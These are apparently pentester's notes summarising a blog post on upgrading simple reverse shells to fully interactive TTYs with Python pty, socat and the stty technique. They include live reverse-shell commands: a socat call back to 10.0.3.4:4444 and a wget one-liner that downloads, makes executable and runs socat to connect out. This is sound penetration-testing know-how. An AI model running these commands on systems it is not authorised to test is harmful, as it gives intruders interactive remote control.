Upgrading Simple Shells to Fully Interactive TTYs
by ropnop 2017
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
| Notes |
|---|
| “simple” shells running under netcat or a basic socket program/script have a suboptimal user experience |
| accidentally hitting Control-C will kill the session |
| tab completion doesnt work |
| can’t use any interactive programs such as a text editor or a pager |
| can’t use su or sudo |
| can’t use arrow keys |
| Pentest Monkey - Post-exploitation without a TTY http://pentestmonkey.net/blog/post-exploitation-without-a-tty |
| Phineas Fisher Hacks Catalan Police Union Website https://www.youtube.com/watch?v=oI_ZhFCS3AQ#t=25m53s |
| Phineas Fisher - Hackingteam Writeup http://pastebin.com/raw/0SNSvyjJ |
| Kali Linux |
| reverse shell |
| nc -e |
| netcat reverse shells |
| msfvenom - LHOST LPORT RPORT |
| Perl reverse shell |
| Python pty module |
| .. Control-C still kills session |
| .. lots of shell/tty features are still not available, but its a better user experience than a vanilla reverse shell |
| socat is netcat on steroids |
| socat tty listener |
.. listener: socat <tty,raw,echo=0> tcp-listen:4444 |
| .. victim: socat exec:‘bash -li’,pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 |
| static-linked binaries: https://github.com/andrew-d/static-binaries |
| .. wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:‘bash -li’,pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 |
| Phineas Fisher stty technique |
| ..catch a reverse shell with netcat -lp 4444 |
| ..background it with Control-Z after you catch the connection |
| ..echo $TERM; stty -a ### need the TERM type and console’s size in rows/columns |
| ..stty raw -echo |
| ..fg ### bring the netcat session into the foreground |
| ..reset |
| ..export SHELL=bash |
| ..export TERM=TERM_FROM_COMMAND_ABOVE |
| ..stty rows ROWS_FROM_ABOVE columns COLUMNS_FROM_ABOVE |
| reverse shell cheat sheet |